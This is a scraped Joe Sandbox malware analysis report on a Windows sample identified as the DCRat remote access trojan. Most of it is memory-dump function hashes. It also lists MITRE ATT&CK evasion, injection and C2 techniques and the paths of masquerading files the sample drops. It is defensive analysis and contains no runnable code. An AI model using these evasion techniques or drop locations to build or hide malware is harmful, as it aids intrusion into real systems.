Instruction Fuzzy Hash: A6D05E30B10D0D4B8B0CB62D885C430F3D1E7B9202794536D940AC2295EE25ECC5C784

Function 00007FF848F5B8B0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ce6ab6ad64761eee6811a35da4795b5e7c954a634d372ad9337134928b75cd5
Instruction ID: 0e24e5ff28ef7680f86e34f90e2f45178c8041ce21817bba0418c2062489e99d
Opcode Fuzzy Hash: 9ce6ab6ad64761eee6811a35da4795b5e7c954a634d372ad9337134928b75cd5
Instruction Fuzzy Hash: 44D05E30B20D0D4B8B0CB62D885C430F3D1EBA92027945269940AC2295EE25ECC58B84

Function 00007FF848F336F0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80

Function 00007FF848F5A630 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848F5A5A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848F5E7A0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FF848F5E923 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 464fddc6e2a43576159e967e108016c0f2b826882463ff73fb42ebf9aca57735
Instruction ID: 784e90a5ca39fb3ae8be432e41d0c505f7165e467cdde767c13d0f9e057c7f16
Opcode Fuzzy Hash: 464fddc6e2a43576159e967e108016c0f2b826882463ff73fb42ebf9aca57735
Instruction Fuzzy Hash: 3AE0BF7151E6485FD644FB04D49199EF7E1FF94350F80153DF04A833A6DA25A582C746

Function 00007FF848F665D8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6cb278fd97d19fedea34ee09cab091c4720b7ac9d5555865ec8cdd488e1b78
Instruction ID: 37f2a7711e99f2e4e7348af0d87010498defe57b4bac56cf1f93562577c8b117
Opcode Fuzzy Hash: df6cb278fd97d19fedea34ee09cab091c4720b7ac9d5555865ec8cdd488e1b78
Instruction Fuzzy Hash: 84D0A730710D0C4B8F0CB63C885843073D2E7692067A4016DD00EC22D1ED17DC86C740

Function 00007FF848F62408 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d806c75d694ee5c19550d621f33b079c9da888a5a8d2416e1a041e9fa42ebc2
Instruction ID: 32a78c72339b908164228261a3445235206e62b9e2f8cf3e69979b8e522428b5
Opcode Fuzzy Hash: 6d806c75d694ee5c19550d621f33b079c9da888a5a8d2416e1a041e9fa42ebc2
Instruction Fuzzy Hash: DFD0C930A64D084F9B4CBB2C885996073D1EB69216B9540A9D00AC72A5EA6AD899C741

Function 00007FF848F65D18 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16857200e7eedcba8ed6946f9ae52e791bb2be653abfd2da041a2f9a467ce0d2
Instruction ID: 5cf217328daabda84b2aafeed75b256ec54d49fab8a681d2524fc691be801e18
Opcode Fuzzy Hash: 16857200e7eedcba8ed6946f9ae52e791bb2be653abfd2da041a2f9a467ce0d2
Instruction Fuzzy Hash: 19D0C930B64D084F8B4CB72C885996072E1EB69216B9541A9E00AD72A1EA6AD899C781

Function 00007FF848F581B0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848F51CE0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848F53DA0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FF848F56EE8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b149657522fc565acf17dc64281542a7e2779e783678d5615252c021e91a76
Instruction ID: 6c30d4084265c82f076548962a5be2522167400d8d5af1fe4570f46d91896e52
Opcode Fuzzy Hash: 26b149657522fc565acf17dc64281542a7e2779e783678d5615252c021e91a76
Instruction Fuzzy Hash: B8D01234B94D044FC70CB73C8859874B391EB6A216B9540A9D00BC72B2EA6ADC89C741

Function 00007FF848F3442C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37988d7ef1ebf1822420acb24b9d9f40b12de828ab309c05c1285543611237d9
Instruction ID: 846e981ba628cbcef6e86329da3c99ed343fdcae594bbc6a8fbe225e12d37f32
Opcode Fuzzy Hash: 37988d7ef1ebf1822420acb24b9d9f40b12de828ab309c05c1285543611237d9
Instruction Fuzzy Hash: A4D09E30D1C94B8FE695FF9C94506B922A0EF34380F100472E85DD31C6CF69E821976A

Function 00007FF848F33B84 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 053e190781f13a5efed93d0b96fb73dc004caf614651f522875e822f2e9981bf
Instruction ID: eaa239c50c13d571a7e190c330dd34cc44041538921f2d0abd6812cfbac999a7
Opcode Fuzzy Hash: 053e190781f13a5efed93d0b96fb73dc004caf614651f522875e822f2e9981bf
Instruction Fuzzy Hash: ACD0C934A1950E9ADB50EB58C8006BDBA71EF40340F50513A905A63286CE3829418B40

Function 00007FF848F5DEC2 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c5141de3a3428f3bfe77da3f4205f687afc5cda52119078f495e2cb60400e10
Instruction ID: f87c10c42f9fd70e7500e979738576eeddd1319b6e50499700e0a9392c50a4ba
Opcode Fuzzy Hash: 2c5141de3a3428f3bfe77da3f4205f687afc5cda52119078f495e2cb60400e10
Instruction Fuzzy Hash: F9C04C52E198164AF248761814591B84391A768A90B54007DD00AC21C7ED1819420549

Function 00007FF848F60F70 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F51000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f51000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c603c8aadfb872731c6ac5d532a5fdf9c1b810309217e2260d56bb125a481a1
Instruction ID: e4b9f5718a506a370617f7e5438d3ab26ad0d6d84ddccd3178fd87a1e7144db8
Opcode Fuzzy Hash: 6c603c8aadfb872731c6ac5d532a5fdf9c1b810309217e2260d56bb125a481a1
Instruction Fuzzy Hash: 03B01200CDF41B00D81832B60852064B410AF48184FC421F0D80C600C9AC4D20F60146

Function 00007FF848F329E0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2920799884.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ff848f30000_WinStore.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12979c5ee12200f5f66c1468dcdbc2e50dd930fe628b8363c9f32a4ce7e1326
Instruction ID: 7f99522c329940e36fd3f83bd54a8e51857fc2a6e3ac57420847eb629f64901e
Opcode Fuzzy Hash: d12979c5ee12200f5f66c1468dcdbc2e50dd930fe628b8363c9f32a4ce7e1326
Instruction Fuzzy Hash: 41A00214C9B81B06E81936FA2D870D978509B89294FC91560E808801C6F98F25F902AB

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 67VB5TS184.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Sidebar\Gadgets\0569fd69283a46

C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe

C:\Program Files (x86)\Windows Sidebar\Gadgets\hjAOLvfTLePJensZtANoSVrh.exe:Zone.Identifier

C:\Program Files (x86)\WindowsPowerShell\Modules\9e60a5f7a3bd80

C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe

C:\Program Files (x86)\WindowsPowerShell\Modules\SystemSettings.exe:Zone.Identifier

C:\Users\Default\0569fd69283a46

C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe

C:\Users\Default\hjAOLvfTLePJensZtANoSVrh.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\67VB5TS184.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WinStore.App.exe.log

C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat

Windows Analysis Report
67VB5TS184.exe